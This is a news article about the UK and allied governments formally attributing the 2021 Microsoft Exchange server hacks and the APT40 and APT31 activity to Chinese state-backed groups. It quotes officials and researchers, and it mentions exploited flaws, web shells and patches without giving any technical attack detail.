UK holds China responsible for Exchange server hacks

At least 30,000 organisations across the United States were compromised earlier this year through four security bugs in Microsoft Exchange server email software

The UK and its allies have formally attributed the Microsoft Exchange hack to Chinese state-backed groups.

In a detailed post on Monday, the UK's National Cyber Security Centre (NCSC) said threat actors affiliated with the Chinese government were 'responsible for gaining access to computer networks around the world via Microsoft Exchange servers.'

The NCSC said, 'it was highly likely that China-backed HAFNIUM group was responsible for the activity.'

"The attack on Microsoft Exchange servers is another serious example of a malicious act by Chinese state-backed actors in cyberspace," NCSC Director of Operations Paul Chichester said.

"This kind of behaviour is completely unacceptable, and alongside our partners we will not hesitate to call it out when we see it."

Foreign Secretary Dominic Raab described the attacks as "a reckless but familiar pattern of behaviour".

He urged the Chinese government to end what he called "systematic cyber sabotage," or it should "expect to be held account if it does not".

Attackers targeted Microsoft Exchange Server email software earlier this year, exploiting four security flaws to affect at least 30,000 organisations in the USA, alone.

Security researcher Brian Krebs said a Chinese espionage group seeded "hundreds of thousands" of organisations worldwide with tools that gave the attackers "total, remote control over affected systems".

In each incident, the attackers left behind a web shell: a password-protected hacking tool that could be accessed over the Internet from any browser, providing administrative access to the victims' servers.

Microsoft released security updates to address the bugs on 2nd March, and advised customers using Exchange Server to patch their systems as early as possible. However, the updates also prompted the 'Hafnium' threat group to step up its attacks on servers that were still unpatched.

Holding to account

In addition to the Exchange Server attacks, the UK government has also attributed cyber activity that researchers have dubbed 'APT40' and 'APT31' to the Chinese Ministry of State Security.

The government said there is credible evidence to suggest that sustained and irresponsible cyber activity continues to emanate from China.

The Biden administration has said in a statement that attacks launched by China-backed groups had resulted in 'significant remediation costs for its mostly private sector victims.'

'We have raised our concerns about both this incident and the [People's Republic of China's] broader malicious cyber activity with senior PRC Government officials, making clear that the PRC's actions threaten security, confidence, and stability in cyberspace,' the statement added.

The Australian government said it was seriously concerned about reports from its allies that China's Ministry of State Security was 'engaging contract hackers who have carried out cyber-enabled intellectual property theft for personal gain and to provide commercial advantage to the Chinese Government.'

'Australia calls on all countries - including China - to act responsibly in cyberspace,' it added.